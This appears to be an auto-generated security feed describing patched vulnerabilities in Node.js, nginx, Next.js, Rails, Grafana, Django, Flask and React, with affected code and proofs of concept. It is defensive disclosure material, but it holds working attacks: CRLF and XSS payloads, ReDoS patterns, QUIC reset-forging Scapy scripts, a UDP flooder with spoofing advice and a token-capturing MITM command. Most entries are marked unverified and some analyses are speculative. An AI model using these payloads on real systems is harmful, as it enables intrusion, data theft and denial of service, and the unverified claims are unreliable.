Mar 2, 2026, 07:10 PM — nodejs/node

Commit: acb79bc

Author: Matteo Collina

The `path` property on `ClientRequest` was only validated against `INVALID_PATH_REGEX` at construction time. After construction, an attacker (or vulnerable application code) could reassign `req.path` to include CRLF sequences (`\\r\\n`), which would then be flushed verbatim to the socket in `_implicitHeader()`, allowing injection of arbitrary HTTP headers or request smuggling. The patch adds a getter/setter using a symbol-backed property so validation runs on every assignment.

🔍 View Affected Code & PoC

Affected Code

this.path = options.path || '/';

Proof of Concept

const http = require('http');
const req = new http.ClientRequest({ host: 'example.com', port: 80, path: '/safe', method: 'GET', createConnection: () => {} });
// After construction, mutate path with CRLF injection
req.path = '/safe\r\nX-Injected: malicious\r\nFoo: bar';
// When _implicitHeader() fires, it sends: GET /safe\r\nX-Injected: malicious\r\nFoo: bar HTTP/1.1
// This injects arbitrary headers into the outgoing HTTP request

🔥 HIGH UNVERIFIED CRLF Injection

Mar 2, 2026, 12:49 PM — nodejs/node

Commit: e78bf55

Author: Richard Clarke

The `writeEarlyHints()` function in Node.js HTTP server directly concatenated user-supplied header names and values into the raw HTTP/1.1 response without any validation. Unlike `setHeader()` and `writeHead()`, no calls to `validateHeaderName()`, `validateHeaderValue()`, or `checkInvalidHeaderChar()` were made, allowing CRLF sequences to pass through unchecked and inject arbitrary HTTP headers or entire responses. The patch adds proper validation for header names, values, and Link header URLs.

🔍 View Affected Code & PoC

Affected Code

const keys = ObjectKeys(hints);
  for (let i = 0; i < keys.length; i++) {
    const key = keys[i];
    if (key !== 'link') {
      head += key + ': ' + hints[key] + '\r\n';
    }
  }

Proof of Concept

const http = require('http');
const server = http.createServer((req, res) => {
  // Inject a fake Set-Cookie header via CRLF in a non-link header value
  res.writeEarlyHints({
    'link': '</style.css>; rel=preload; as=style',
    'X-Custom': 'value\r\nSet-Cookie: session=hijacked; Path=/'
  });
  res.end('hello');
});
// The raw HTTP response will contain an injected 'Set-Cookie: session=hijacked' header
// because 'value\r\nSet-Cookie: session=hijacked; Path=/' is concatenated directly into the response.
// Similarly, injecting via header name: { 'X-Foo\r\nSet-Cookie: evil=1': 'v' }

⚠️ MEDIUM UNVERIFIED Header Injection / Information Disclosure

Mar 2, 2026, 12:49 AM — nodejs/node

Commit: a6e9e32

Author: Node.js GitHub Bot

The cache interceptor was spreading `result.vary` headers directly into revalidation requests without filtering out `null` values. When a request header specified in the `Vary` header was absent from the original request, it was stored as `null` in the cache entry's `vary` map. Spreading this `null` value into the revalidation headers could corrupt the header object and potentially send unintended null-valued headers to the server. The patch adds a null-check guard so only present header values are forwarded during revalidation.

🔍 View Affected Code & PoC

Affected Code

if (result.vary) {
  headers = {
    ...headers,
    ...result.vary
  }
}

Proof of Concept

// Server responds with Vary: accept-encoding
// Original request does NOT include accept-encoding header
// Cache stores vary = { 'accept-encoding': null }
// On revalidation, the spread { ...headers, ...result.vary } produces:
// { 'if-modified-since': '...', 'accept-encoding': null }
// Sending a request with a null-valued header could bypass server-side Vary matching
// or cause unexpected behavior in downstream servers/proxies that interpret null differently.
// Trigger: make a cached request without 'accept-encoding', wait for stale-while-revalidate,
// observe the revalidation request incorrectly includes 'accept-encoding: null'

⚠️ MEDIUM UNVERIFIED ReDoS (Regular Expression Denial of Service)

Mar 1, 2026, 02:27 PM — nodejs/node

Commit: 4d0cb65

Author: Node.js GitHub Bot

This update to minimatch 10.2.4 adds mitigations for ReDoS vulnerabilities by introducing `maxGlobstarRecursion` and `maxExtglobRecursion` limits to prevent catastrophic backtracking when processing untrusted glob patterns. The README explicitly acknowledges that user-controlled glob patterns can be weaponized for DoS attacks. The patch adds depth tracking and recursion limits for extglob and globstar patterns to cap the complexity of the generated regular expressions.

🔍 View Affected Code & PoC

Affected Code

// No recursion depth limits on extglob nesting or globstar patterns
// Untrusted input could generate catastrophically backtracking RegExp
const assertValidPattern: (pattern: any) => void = (
  pattern: any,
): asserts pattern is string => {

Proof of Concept

const { minimatch } = require('minimatch');
// Before the patch, deeply nested extglob patterns from untrusted input
// could cause catastrophic backtracking:
const evilPattern = '*(a|*(a|*(a|*(a|*(a|*(a|*(a|*(a|*(a|*(a))))))))))';
const evilInput = 'a'.repeat(30);
// This would hang/crash Node.js process due to ReDoS
minimatch(evilInput, evilPattern);

🔥 HIGH UNVERIFIED Information Disclosure (Uninitialized Memory Exposure)

Feb 27, 2026, 06:36 PM — nodejs/node

Commit: cc6c188

Author: Mert Can Altin

Before the patch, Buffer.concat() computed the total allocation size using the user-controllable `.length` property of each element, then allocated with `Buffer.allocUnsafe(length)`. For typed arrays, an attacker could spoof a larger `.length` via a getter, causing an oversized uninitialized Buffer to be returned, leaking process memory contents. The patch fixes this by using the typed array’s intrinsic byte length (`TypedArrayPrototypeGetByteLength`) and by allocating via `allocate` plus explicit zero-filling of any slack.

🔍 View Affected Code & PoC

Affected Code

for (let i = 0; i < list.length; i++) {
  if (list[i].length) {
    length += list[i].length;
  }
}
const buffer = Buffer.allocUnsafe(length);

Proof of Concept

/* Run on a Node version before cc6c18802dc6dfc041f359bb417187a7466e9e8f */

// Attacker-controlled Uint8Array with spoofed .length getter inflates allocation size.
const u8_1 = new Uint8Array([1, 2, 3, 4]);
const u8_2 = new Uint8Array([5, 6, 7, 8]);
Object.defineProperty(u8_1, 'length', { get() { return 1024 * 1024; } }); // 1MB

const b = Buffer.concat([u8_1, u8_2]);
console.log('returned length:', b.length); // BEFORE PATCH: 1048576 + 8 (or similar huge value)

// Only first 8 bytes are controlled; the rest is uninitialized heap data.
// Demonstrate leak by showing non-zero/unexpected bytes in the tail.
let leaked = 0;
for (let i = 8; i < b.length; i++) {
  if (b[i] !== 0) { leaked++; if (leaked > 32) break; }
}
console.log('non-zero bytes after concatenated data (leak indicator):', leaked);

// Print a slice of leaked memory.
console.log('tail sample:', b.subarray(8, 8 + 64));

🔥 HIGH UNVERIFIED Improper Authentication / Cryptographic Token Misbinding (QUIC Stateless Reset token exposure leading to DoS)

Feb 26, 2026, 02:36 PM — nginx/nginx

Commit: f72c745

Author: Roman Arutyunyan

Before the patch, the QUIC stateless reset token was derived only from a shared secret and the connection ID, making the token identical across workers. In a multi-worker configuration with packet steering, an attacker could intentionally route a victim connection's packet to a different worker to trigger emission/observation of the stateless reset token, then forge a QUIC Stateless Reset to immediately terminate the victim connection (remote DoS). The patch binds the derived token to the worker number by incorporating ngx_worker into the KDF input, making tokens differ per worker and preventing cross-worker token acquisition/abuse.

🔍 View Affected Code & PoC

Affected Code

tmp.data = secret;
 tmp.len = NGX_QUIC_SR_KEY_LEN;

 if (ngx_quic_derive_key(c->log, "sr_token_key", &tmp, cid, token,
                         NGX_QUIC_SR_TOKEN_LEN) != NGX_OK) {

Proof of Concept

Prereqs: nginx built with QUIC, configured with multiple workers (e.g., worker_processes 4;), and client behind NAT or attacker can spoof/own a 5-tuple to influence RSS/ECMP so packets land on different workers.

1) Establish a QUIC connection from victim client (or attacker-controlled client) to nginx and note the server-chosen DCID used in 1-RTT packets.

2) Force a packet for that existing connection to be processed by the "wrong" worker (e.g., by changing UDP source port so Linux RSS hashes to another receive queue/worker while keeping the same QUIC DCID):
   # pseudo: send a 1-RTT packet with same DCID but altered UDP 5-tuple
   python3 - <<'PY'
from scapy.all import *
# Requires QUIC packet crafting; below is schematic.
SERVER_IP='1.2.3.4'
SERVER_PORT=443
SRC_IP='victim-or-attacker-ip'
NEW_SPORT=40000  # choose to steer to different worker via RSS hash
DCID=bytes.fromhex('00112233445566778899aabbccddeeff')  # observed DCID
# payload must be a syntactically valid short-header 1-RTT QUIC packet for that DCID
quic_pkt = b'\x40' + DCID + b'\x00'*32
send(IP(src=SRC_IP,dst=SERVER_IP)/UDP(sport=NEW_SPORT,dport=SERVER_PORT)/Raw(load=quic_pkt), verbose=False)
PY

3) Observe that nginx responds with a QUIC Stateless Reset on that 5-tuple. Capture it with tcpdump:
   sudo tcpdump -ni any udp port 443 -vv -X
   The Stateless Reset contains a 16-byte token at the end of the UDP payload.

4) Use the captured token to kill the real connection: send a forged Stateless Reset to the victim's original 5-tuple (or to the peer that will accept it), with the token at the end:
   python3 - <<'PY'
from scapy.all import *
SERVER_IP='1.2.3.4'
VICTIM_IP='victim-ip'
SPORT=443
DPORT=54321  # victim's UDP port used for the QUIC connection
TOKEN=bytes.fromhex('deadbeef'*4)  # replace with captured 16-byte token
# QUIC Stateless Reset is an unpredictable-looking packet >= 21 bytes, token must be last 16 bytes
payload = b'\x00'*32 + TOKEN
send(IP(src=SERVER_IP,dst=VICTIM_IP)/UDP(sport=SPORT,dport=DPORT)/Raw(load=payload), verbose=False)
PY

Expected result (pre-patch): the victim QUIC stack accepts the Stateless Reset and immediately closes the connection (DoS). Post-patch: token differs per worker, so a token obtained via wrong-worker routing will not validate for the victim's actual worker-path, and the forged reset is ignored.

🔥 HIGH UNVERIFIED NULL Pointer Dereference (Remote Denial of Service)

Feb 24, 2026, 01:33 AM — nginx/nginx

Commit: c67bf94

Author: user.email

Before the patch, the QUIC OpenSSL compatibility keylog callback discarded failures from ngx_quic_compat_set_encryption_secret(). Under memory pressure (allocation failure), the encryption context (secret-&gt;ctx) could remain NULL, yet ngx_quic_compat_create_record() would proceed to encrypt and dereference the NULL ctx, crashing the NGINX worker. The patch checks the return value, marks the QUIC connection as errored to fail the handshake cleanly, and adds a NULL guard in record creation to prevent the crash.

🔍 View Affected Code & PoC

Affected Code

(void) ngx_quic_compat_set_encryption_secret(c, &com->keys, level,
                                             cipher, secret, n);
...
secret = &rec->keys->secret;
ngx_memcpy(nonce, secret->iv.data, secret->iv.len);
/* later: encrypt using secret->ctx (could be NULL) */

Proof of Concept

# PoC: remote crash via QUIC handshake while forcing allocation failure (OOM)
# This demonstrates an exploitable, remotely triggerable DoS when QUIC is enabled
# and the worker runs out of memory during the TLS keylog callback.

# 1) Run nginx with QUIC enabled (HTTP/3) in a memory-cgroup limited container.
# Example docker run limiting memory so malloc failures occur during handshake:
#   docker run --rm -it --memory=64m --pids-limit=256 -p 443:443/udp nginx:quic
# (Use an nginx build/config that enables QUIC and listens on 443 quic.)

# 2) From another host, flood with QUIC handshakes to increase memory pressure:
# Using ngtcp2's client to rapidly initiate TLS/QUIC handshakes:
for i in $(seq 1 2000); do
  ngtcp2-client --exit-on-all-streams-close --timeout=1 127.0.0.1 443 >/dev/null 2>&1 &
done
wait

# Expected behavior BEFORE patch:
# - Under memory pressure, ngx_quic_compat_set_encryption_secret() can fail,
#   leaving secret->ctx NULL.
# - A subsequent CRYPTO record creation attempts to encrypt using NULL ctx,
#   leading to SIGSEGV and worker process crash (remote DoS).
#   (In logs/dmesg you'll see a segfault in the worker.)

# Expected behavior AFTER patch:
# - Handshake fails with internal error; worker does not crash.

🔥 HIGH UNVERIFIED Sensitive Data Exposure (Secrets persisted to cache)

Feb 26, 2026, 02:11 PM — vercel/next.js

Commit: 2307bf6

Author: Tobias Koppers

Before the patch, `ProcessEnv::read_all()` returned a serializable `EnvMap`, which could be automatically persisted into Turbopack/Next.js' on-disk persistent cache. This meant any process environment variable (including secrets like API keys and tokens) could be written to disk and later recovered by anyone with read access to the cache directory (e.g., another local user, CI artifact consumers, or a compromised build agent). The patch introduces `TransientEnvMap` with `serialization = "none"` and changes `read_all()` to return it, preventing env vars from being persisted and forcing them to be re-read from the process environment after cache restore.

🔍 View Affected Code & PoC

Affected Code

/// Reads all env variables into a Map
#[turbo_tasks::function]
fn read_all(self: Vc<Self>) -> Vc<EnvMap>;

// e.g.
Vc::cell(env_snapshot())

Proof of Concept

Prereq: a Next.js/Turbopack project using persistent caching (default local cache dir).

1) Run a build with a secret in the environment so it gets captured by `read_all()`:

   $ export AWS_SECRET_ACCESS_KEY='POC_SUPER_SECRET_123'
   $ export NEXT_TELEMETRY_DISABLED=1
   $ next dev   # or a turbopack-enabled build that populates the persistent cache

2) Search the on-disk cache for the secret (the exact path can vary by platform, but typically under the project’s .next cache or Turbopack cache directory):

   $ rg -n "POC_SUPER_SECRET_123" .next/ 2>/dev/null || true
   $ rg -n "POC_SUPER_SECRET_123" .turbo/ 2>/dev/null || true
   $ rg -n "POC_SUPER_SECRET_123" . 2>/dev/null | head

Expected vulnerable behavior (before patch): the secret string is found in one or more cache files because `EnvMap` was auto-serialized.

Impact demonstration: any actor who can read that cache directory (e.g., another user on the machine, or someone who downloads CI cache artifacts) can recover `AWS_SECRET_ACCESS_KEY` by grepping the cache.

⚠️ MEDIUM UNVERIFIED Denial of Service (DoS) / Amplification via Stateless Reset flooding

Feb 25, 2026, 05:09 PM — nginx/nginx

Commit: e6ffe83

Author: Sergey Kandaurov

Before the patch, nginx would generate and send a QUIC Stateless Reset for every incoming packet that triggered the stateless reset path, with no per-source rate limiting. An attacker could spoof many UDP packets (often with spoofed source IPs) to force the server to spend CPU on hashing/random generation and to emit many Stateless Reset packets, creating resource exhaustion and reflected traffic. The patch adds a per-second Bloom-filter-based limiter keyed by source address so repeated triggers from the same address are declined.

🔍 View Affected Code & PoC

Affected Code

ngx_int_t
ngx_quic_send_stateless_reset(ngx_connection_t *c, ngx_quic_conf_t *conf,
    ngx_quic_header_t *pkt)
{
    ...
    if (pkt->len <= NGX_QUIC_MIN_SR_PACKET) {
        len = pkt->len - 1;
    ...
    return ngx_quic_send(c, buf, len, c->sockaddr, c->socklen);
}

Proof of Concept

Prereq: QUIC enabled on nginx (listen ... quic).

1) Flood the server with UDP datagrams that look like short-header QUIC packets with a random DCID, causing nginx to respond with Stateless Reset repeatedly.

Example Python flooder (sends many packets; if you can spoof, set a victim IP as source to demonstrate reflection):

`​`​`​python
import os, socket, time

target_ip = "NGINX_IP"
target_port = 443  # QUIC port

s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)

# QUIC short header first byte: 0b010xxxxx (0x40..0x7f). Use 0x40.
# Fill rest with random bytes to simulate unknown connection id etc.
pkt_len = 1200
payload = bytes([0x40]) + os.urandom(pkt_len - 1)

end = time.time() + 10
while time.time() < end:
    s.sendto(payload, (target_ip, target_port))
`​`​`​

Expected behavior BEFORE patch: server emits a Stateless Reset for essentially every received datagram (observable with tcpdump on server: `udp and port 443` showing many outgoing packets) and CPU/network usage increases proportionally to attack rate.

Expected behavior AFTER patch: for a given source address, after the first reset in a 1-second window, subsequent reset attempts are mostly dropped (function returns NGX_DECLINED), significantly reducing outgoing packets and server work per attacker address.

If spoofing is available (raw sockets), repeat with varying spoofed source IPs to demonstrate reflection potential; without spoofing, the same script still demonstrates server-side CPU/network DoS from a single host.
CONFIRMED

⚠️ MEDIUM CONFIRMED Cross-Site Scripting (XSS)

Feb 24, 2026, 08:56 PM — rails/rails

Commit: e905b2e

Author: Mike Dalessio

The markdown conversion functionality was vulnerable to XSS attacks through malicious javascript: URLs that could bypass protocol filtering using obfuscation techniques like leading whitespace, HTML entity encoding, or case variations. The patch fixes this by delegating URI validation to Rails::HTML::Sanitizer.allowed_uri? which properly handles these bypass attempts.

🔍 View Affected Code & PoC

Affected Code

if (href = node["href"]) && allowed_href_protocol?(href)
  "[#{inner}](#{href})"
else
  inner
end

Proof of Concept

<a href=" javascript:alert('XSS')">Click me</a> or <a href="&#106;avascript:alert('XSS')">Click me</a> - these would be converted to markdown links that execute JavaScript when clicked, bypassing the original protocol validation

🔥 HIGH UNVERIFIED Authentication Bypass

Feb 24, 2026, 08:05 PM — grafana/grafana

Commit: f1b77b8

Author: colin-stuart

The code allowed SAML authentication to create duplicate user_auth records for SCIM-provisioned users instead of updating existing ones. An attacker could exploit this by logging in via SAML with a SCIM user's credentials to create a new auth record with their own AuthID, potentially bypassing access controls or creating authentication confusion.

🔍 View Affected Code & PoC

Affected Code

if identity.AuthenticatedBy == login.GenericOAuthModule {
    query := &login.GetAuthInfoQuery{AuthModule: identity.AuthenticatedBy, UserId: usr.ID}
    userAuth, err = s.authInfoService.GetAuthInfo(ctx, query)

Proof of Concept

1. SCIM provisions user with email '[email protected]' and creates user_auth record with empty AuthID
2. Attacker performs SAML login with same email '[email protected]' but different AuthID 'attacker-saml-id' 
3. Code fails to find existing auth record by AuthID lookup, creates new user_auth record instead of updating existing one
4. Result: User now has two authentication methods - original SCIM provision + attacker's SAML AuthID, allowing potential unauthorized access
CONFIRMED

🔥 HIGH CONFIRMED Null Pointer Dereference

Feb 24, 2026, 07:51 PM — nodejs/node

Commit: 84d1e6c

Author: Nora Dossche

The code failed to check if BIO_meth_new() returns NULL before passing the result to BIO_meth_set_* functions, causing a null pointer dereference. This could lead to application crashes and potential denial of service when SSL/TLS operations are initiated under memory pressure conditions.

🔍 View Affected Code & PoC

Affected Code

BIO_METHOD* method = BIO_meth_new(BIO_TYPE_MEM, "node.js SSL buffer");
BIO_meth_set_write(method, Write);

Proof of Concept

Trigger memory exhaustion by creating many large objects, then initiate SSL/TLS connection which calls NodeBIO::GetMethod(). When BIO_meth_new() fails and returns NULL due to memory pressure, the subsequent BIO_meth_set_write(NULL, Write) call will dereference NULL pointer causing segmentation fault and application crash.

⚠️ MEDIUM UNVERIFIED Regular Expression Denial of Service (ReDoS)

Feb 24, 2026, 06:11 PM — nodejs/node

Commit: ec33dd9

Author: Node.js GitHub Bot

The minimatch library had a vulnerability where multiple consecutive asterisks (*) in glob patterns could cause exponential backtracking in the generated regular expression, leading to CPU exhaustion. The patch fixes this by coalescing multiple stars into a single star pattern, preventing the ReDoS condition.

🔍 View Affected Code & PoC

Affected Code

if (c === '*') {
  re += noEmpty && glob === '*' ? starNoEmpty : star;
  hasMagic = true;
  continue;
}

Proof of Concept

const { minimatch } = require('minimatch');
// This would cause exponential backtracking and hang the process
minimatch('a'.repeat(50), '*'.repeat(50) + 'x');

⚠️ MEDIUM UNVERIFIED Man-in-the-Middle Attack / Insufficient Certificate Validation

Feb 24, 2026, 09:32 AM — grafana/grafana

Commit: f13db65

Author: Maksym Revutskyi

The code before the patch used HTTP transport without proper TLS certificate validation when communicating with external image renderer services. This allowed attackers to intercept HTTPS communications through man-in-the-middle attacks, potentially exposing authentication tokens and sensitive data. The patch adds support for custom CA certificates to enable proper certificate validation.

🔍 View Affected Code & PoC

Affected Code

var netTransport = &http.Transport{
	Proxy: http.ProxyFromEnvironment,
	Dial: (&net.Dialer{
		Timeout: 30 * time.Second,
	}).Dial,
	TLSHandshakeTimeout: 5 * time.Second,
}

Proof of Concept

1. Set up a malicious proxy/MITM tool like mitmproxy with a self-signed certificate
2. Configure network to route Grafana's image renderer traffic through the proxy
3. The original code would accept any certificate without validation, allowing interception of requests containing X-Auth-Token headers
4. Command: `mitmproxy -p 8080 --certs *=cert.pem` then configure Grafana to use renderer at https://malicious-renderer:8081 - the auth tokens would be captured in plaintext

⚠️ MEDIUM UNVERIFIED Information Disclosure

Feb 11, 2026, 10:22 PM — rails/rails

Commit: 4c07766

Author: Mark Bastawros

The custom inspect methods in various Rails classes could potentially expose sensitive internal state or configuration data through debug output, error messages, or logs. The patch replaces these with a controlled inspection mechanism that only shows explicitly whitelisted instance variables.

🔍 View Affected Code & PoC

Affected Code

def inspect # :nodoc:
  "#<#{self.class.name}:#{'%#016x' % (object_id << 1)}>"
end

Proof of Concept

# In a Rails console or error handler:
connection = ActionCable::Connection::Base.new(server, env)
connection.instance_variable_set(:@secret_token, 'sensitive_data')
puts connection.inspect
# Before patch: Could expose @secret_token and other internals
# After patch: Only shows basic object info without sensitive variables

⚠️ MEDIUM UNVERIFIED Information Disclosure

Feb 24, 2026, 09:19 AM — rails/rails

Commit: 5086622

Author: Jean Boussier

The custom inspect methods in various Rails classes exposed sensitive internal state including cryptographic keys, secrets, and other confidential data in debug output, logs, and error messages. The patch replaces custom inspect methods with a standardized approach that only shows safe instance variables, preventing accidental leakage of sensitive information.

🔍 View Affected Code & PoC

Affected Code

def inspect # :nodoc:
  "#<#{self.class.name}:#{'%#016x' % (object_id << 1)}>"
end

Proof of Concept

# In a Rails console or debug session:
encryptor = ActiveSupport::MessageEncryptor.new(SecretKey.new)
encryptor.inspect
# Before patch: Would expose the secret key in the output
# After patch: Only shows class name and object ID

# Or in ActionCable connection:
connection = ActionCable::Connection::Base.new(server, env)
connection.inspect
# Before patch: Could expose connection secrets, tokens, or session data
# After patch: Only shows safe, filtered instance variables

⚠️ MEDIUM UNVERIFIED Race Condition

Feb 23, 2026, 04:36 PM — vercel/next.js

Commit: 45a8a82

Author: Tobias Koppers

The code had a concurrency bug where the follower's aggregation number was read without proper locking, allowing the inner-vs-follower classification decision to be made on stale data if the aggregation number changed concurrently. This could lead to incorrect task classification and potential data corruption in the aggregation system.

🔍 View Affected Code & PoC

Affected Code

let follower_aggregation_number = get_aggregation_number(&follower);
let should_be_follower = follower_aggregation_number < upper_aggregation_number;

Proof of Concept

Thread 1 reads follower's aggregation number (e.g., 10) and determines it should be a follower. Thread 2 concurrently updates the same follower's aggregation number to a higher value (e.g., 20). Thread 1 proceeds with the stale classification decision, incorrectly treating a node that should be an inner node as a follower, leading to incorrect aggregation graph structure and potential data corruption.

⚠️ MEDIUM UNVERIFIED Open Redirect

Feb 23, 2026, 10:14 AM — grafana/grafana

Commit: e8a2b4b

Author: xavi

The ValidateRedirectTo function was vulnerable to open redirect attacks through URL fragments. Attackers could bypass path validation by using URL fragments containing dangerous patterns like '../' or '//', which were not sanitized before the redirect. The patch fixes this by validating fragments and returning a sanitized URL string instead of the original user input.

🔍 View Affected Code & PoC

Affected Code

if redirectDenyRe.MatchString(to.Path) {
	return errForbiddenRedirectTo
}
// Fragment validation was missing
return redirectTo // Original unsanitized input returned

Proof of Concept

POST /login with redirect_to cookie set to '/dashboard#//evil.com/steal' - the fragment '#//evil.com/steal' would bypass the path validation regex and could be used in client-side JavaScript to redirect users to the malicious domain

🔥 HIGH UNVERIFIED Buffer Overflow/Out-of-bounds Memory Access

Feb 23, 2026, 12:45 AM — nginx/nginx

Commit: bb8ec29

Author: CodeByMoriarty

The code failed to validate that sync sample values in MP4 stss atoms are 1-based as required by ISO 14496-12. A zero-valued stss entry caused the key_prefix calculation to exceed consumed samples, leading the backward loop in ngx_http_mp4_crop_stts_data() to walk past the beginning of the stts data buffer, causing out-of-bounds memory access.

🔍 View Affected Code & PoC

Affected Code

sample = ngx_mp4_get_32value(entry);
if (sample > start_sample) {
    break;
}
key_prefix = start_sample - sample;

Proof of Concept

Craft a malicious MP4 file with an stss atom containing a zero sync sample value (0x00000000). When nginx processes this file with mp4 module enabled and start_key_frame is on, the zero sample causes key_prefix to equal start_sample + 1, which exceeds the samples processed in the forward stts pass. This triggers the backward loop in ngx_http_mp4_crop_stts_data() to read/write beyond the stts buffer boundaries, potentially leading to memory corruption or information disclosure.

⚠️ MEDIUM UNVERIFIED Path Traversal

Feb 21, 2026, 04:06 AM — vercel/next.js

Commit: 632725b

Author: Sebastian "Sebbie" Silbermann

The script accepts user-provided file paths without validation and directly converts them to file URLs, allowing attackers to access arbitrary files on the system. The patch adds proper path handling using pathToFileURL() which normalizes paths and prevents directory traversal attacks.

🔍 View Affected Code & PoC

Affected Code

if (version !== null && version.startsWith('/')) {
    version = pathToFileURL(version).href
}

Proof of Concept

pnpm run sync-react --version "../../../etc/passwd" would allow reading system files outside the intended React checkout directory before the patch

⚠️ MEDIUM UNVERIFIED Cross-Site Scripting (XSS)

Feb 20, 2026, 02:43 PM — django/django

Commit: 283ea9e

Author: SiHyunLee

The Django admin interface was vulnerable to XSS attacks when displaying model string representations that contained only whitespace or malicious scripts. The vulnerability occurred because whitespace-only strings were not properly sanitized before being rendered in HTML contexts, allowing attackers to inject malicious scripts through model __str__ methods.

🔍 View Affected Code & PoC

Affected Code

obj_repr = format_html('<a href="{}">{}</a>', urlquote(obj_url), obj)
# Direct use of obj without sanitization

Proof of Concept

Create a Django model with a __str__ method that returns '<script>alert("XSS")</script>' or just whitespace followed by script tags. When viewing this object in the Django admin interface, the malicious script would execute in the browser due to improper escaping of the object representation in admin templates and breadcrumbs.

🔥 HIGH UNVERIFIED Authorization Bypass

Feb 20, 2026, 08:25 AM — grafana/grafana

Commit: 430abe7

Author: Georges Chaudy

The old authorization system used deprecated Compile method which performed authorization checks item-by-item during iteration, potentially allowing unauthorized access to resources due to race conditions or incomplete authorization state. The patch replaces this with FilterAuthorized using BatchCheck which performs more robust batch authorization before returning results.

🔍 View Affected Code & PoC

Affected Code

checker, _, err := s.access.Compile(ctx, user, claims.ListRequest{
	Group: key.Group,
	Resource: key.Resource,
	Namespace: key.Namespace,
	Verb: utils.VerbGet,
})

Proof of Concept

1. User with limited permissions makes concurrent List requests for resources they shouldn't access
2. During the item-by-item authorization check in the old code, if authorization state changes between checks or there's a race condition, some unauthorized items could pass through the checker
3. Attacker could potentially access resources in folders/namespaces they don't have permissions for by exploiting timing windows in the deprecated Compile authorization flow

⚠️ MEDIUM UNVERIFIED Stack Overflow DoS

Feb 20, 2026, 04:48 AM — vercel/next.js

Commit: ca0957d

Author: Josh Story

The unhandled rejection filter module was being bundled twice, causing mutual recursion when handling unhandled Promise rejections. Each instance captured the other's handler, creating an infinite loop that would overflow the stack and crash the server on any unhandled rejection.

🔍 View Affected Code & PoC

Affected Code

function filteringUnhandledRejectionHandler(reason, promise) {
  // Handler gets called recursively between two instances
  // No guards to prevent infinite recursion
}

Proof of Concept

// Trigger an unhandled Promise rejection in a Next.js server with the vulnerable setup
Promise.reject(new Error('test rejection'));
// This would cause infinite recursion between the two installed handlers,
// eventually overflowing the call stack and crashing the Node.js process
CONFIRMED

⚠️ MEDIUM CONFIRMED Hash Collision

Feb 19, 2026, 06:22 PM — grafana/grafana

Commit: 6d3440a

Author: beejeebus

The code was truncating SHA256 hashes to only 10 characters when generating secret names, dramatically increasing collision probability from negligible to ~1 in 16^10. This allows attackers to craft field names that collide with existing secret field names, potentially accessing or modifying secrets they shouldn't have access to.

🔍 View Affected Code & PoC

Affected Code

h := sha256.New()
h.Write([]byte(dsUID))
h.Write([]byte("|"))
h.Write([]byte(key))
n := hex.EncodeToString(h.Sum(nil))
return apistore.LEGACY_DATASOURCE_SECURE_VALUE_NAME_PREFIX + n[0:10]

Proof of Concept

1. Target existing secret with field name 'password' for dsUID 'abc123' (generates truncated hash like 'lds-sv-0d27eff323')
2. Craft malicious field name by brute-forcing inputs until finding one that produces same 10-character prefix
3. With ~1.1M attempts, find collision like field name 'malicious_field_xyz' that also produces 'lds-sv-0d27eff323'
4. Create datasource with the colliding field name to access/overwrite the legitimate 'password' secret

⚠️ MEDIUM UNVERIFIED Prototype Pollution

Feb 19, 2026, 04:37 PM — facebook/react

Commit: f247eba

Author: Tim Neutkens

The original code used JSON.parse with a reviver function that could potentially allow __proto__ property manipulation during RSC payload deserialization. The patch explicitly deletes __proto__ keys during the walking phase and moves away from the reviver approach to prevent prototype pollution attacks.

🔍 View Affected Code & PoC

Affected Code

return JSON.parse(json, response._fromJSON);
// where _fromJSON reviver processes all key-value pairs including __proto__

Proof of Concept

Send RSC payload with malicious JSON: {"__proto__": {"polluted": true, "isAdmin": true}} - this could pollute Object.prototype during the reviver processing before parseModelString filters are applied, potentially affecting application logic that checks object properties.

⚠️ MEDIUM UNVERIFIED HTTP Response Splitting / Cache Poisoning

Feb 19, 2026, 03:02 AM — pallets/flask

Commit: c17f379

Author: David Lord

The session was not properly marked as accessed when only reading session metadata (keys, length checks), allowing responses to be cached without the Vary: Cookie header. This could lead to cache poisoning where one user's cached response is served to another user, potentially exposing session-dependent data.

🔍 View Affected Code & PoC

Affected Code

def __getitem__(self, key: str) -> t.Any:
    self.accessed = True
    return super().__getitem__(key)

def get(self, key: str, default: t.Any = None) -> t.Any:
    self.accessed = True

Proof of Concept

1. User A visits `/check` endpoint that does `if 'admin' in session:` (metadata access only)
2. Response cached without Vary: Cookie header since session.accessed stays False
3. User B (different session) visits same endpoint, gets User A's cached response
4. User B sees content based on User A's session state instead of their own session

⚠️ MEDIUM UNVERIFIED Information Disclosure

Feb 19, 2026, 03:35 AM — pallets/flask

Commit: 089cb86

Author: David Lord

The session was not being marked as accessed when only checking keys/metadata, allowing caching proxies to cache pages for different users. This could lead to session data being served to wrong users through shared caches. The patch fixes this by tracking session access at the request context level.

🔍 View Affected Code & PoC

Affected Code

def __getitem__(self, key: str) -> t.Any:
    self.accessed = True
    return super().__getitem__(key)

Proof of Concept

1. User A logs in and visits /profile (session contains user data)
2. Caching proxy caches the response without Vary: Cookie header
3. User B visits /profile and gets User A's cached profile data
4. This occurs because operations like 'username' in session or len(session) didn't set accessed=True, so no Vary header was added

⚠️ MEDIUM UNVERIFIED Information Disclosure

Feb 19, 2026, 05:56 AM — pallets/flask

Commit: daca74d

Author: David Lord

The session was not being marked as accessed when only reading operations like checking keys or length occurred, causing the 'Vary: Cookie' header to not be set. This could allow caching proxies to serve the same cached response to different users, potentially leaking session-dependent data between users.

🔍 View Affected Code & PoC

Affected Code

def session(self) -> SessionMixin:
    if self._session is None:
        self._session = si.make_null_session(self.app)
    return self._session

Proof of Concept

User A visits `/profile` which checks `if 'user_id' in session:` and returns personalized data. Caching proxy caches this response without Vary: Cookie header. User B visits same URL and receives User A's cached personal data because session wasn't marked as accessed during the `in` operation.

⚠️ MEDIUM UNVERIFIED Race Condition

Feb 19, 2026, 12:58 PM — grafana/grafana

Commit: b0d812f

Author: Rafael Bortolon Paulovic

The code had a race condition vulnerability during database migrations where concurrent writes to legacy tables could occur during unified storage migrations in rolling upgrade scenarios. This could lead to data corruption or inconsistent state as multiple processes could simultaneously modify the same database tables without proper synchronization.

🔍 View Affected Code & PoC

Affected Code

Resources: []migrations.ResourceInfo{
	{GroupResource: folderGR, LockTable: "folder"},
	{GroupResource: dashboardGR, LockTable: "dashboard"},
}

Proof of Concept

